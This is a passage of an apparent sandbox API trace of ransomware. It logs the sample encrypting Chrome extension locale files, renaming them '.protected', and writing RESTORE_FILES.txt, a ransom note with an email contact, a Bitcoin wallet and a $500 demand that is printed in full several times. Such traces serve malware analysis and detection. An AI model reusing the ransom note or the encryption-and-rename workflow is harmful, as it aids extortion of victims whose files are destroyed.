Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json") returned 157 [0079.727] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json") returned 157 [0079.727] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.727] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.728] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.728] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.728] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.728] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.728] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.728] CloseHandle (hObject=0x168) returned 1 [0079.728] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.protected") returned 167 [0079.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.protected")) returned 1 [0079.729] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.729] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.729] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\RESTORE_FILES.txt") returned 161 [0079.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.729] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.729] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.730] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.730] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.730] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.730] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.730] CloseHandle (hObject=0x164) returned 1 [0079.730] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.730] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0079.730] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0079.730] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0079.730] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0079.730] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0079.730] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el") returned 143 [0079.731] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0079.731] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0079.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\*") returned 145 [0079.731] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.731] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.731] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.731] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.731] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.731] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\.") returned 145 [0079.731] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.731] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.731] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.731] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.731] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.731] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.731] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\..") returned 146 [0079.731] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.731] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.731] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json") returned 157 [0079.731] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.731] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.731] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.731] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json") returned 157 [0079.732] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json") returned 157 [0079.732] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json") returned 157 [0079.732] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.732] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.732] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.732] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.733] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.733] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.733] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.733] CloseHandle (hObject=0x168) returned 1 [0079.733] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.protected") returned 167 [0079.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.protected")) returned 1 [0079.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.734] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.734] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\RESTORE_FILES.txt") returned 161 [0079.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.734] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.734] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.735] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.735] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.735] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.735] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.735] CloseHandle (hObject=0x164) returned 1 [0079.735] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.735] lstrcmpiW (lpString1="en", lpString2="Windows") returned -1 [0079.735] lstrcmpiW (lpString1="en", lpString2="Program Files") returned -1 [0079.735] lstrcmpiW (lpString1="en", lpString2="Program Files (x86)") returned -1 [0079.735] lstrcmpiW (lpString1="en", lpString2="$Recycle.bin") returned 1 [0079.735] lstrcmpiW (lpString1="en", lpString2="System Volume Information") returned -1 [0079.735] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en") returned 143 [0079.735] lstrcmpW (lpString1="en", lpString2=".") returned 1 [0079.735] lstrcmpW (lpString1="en", lpString2="..") returned 1 [0079.735] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\*") returned 145 [0079.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.736] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.736] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.736] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.736] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.736] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.736] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\.") returned 145 [0079.736] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.736] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.736] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.736] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.736] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.736] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.736] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.736] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\..") returned 146 [0079.736] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.736] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.736] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.736] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json") returned 157 [0079.736] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.736] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.736] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.736] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json") returned 157 [0079.736] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.737] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json") returned 157 [0079.737] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.737] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 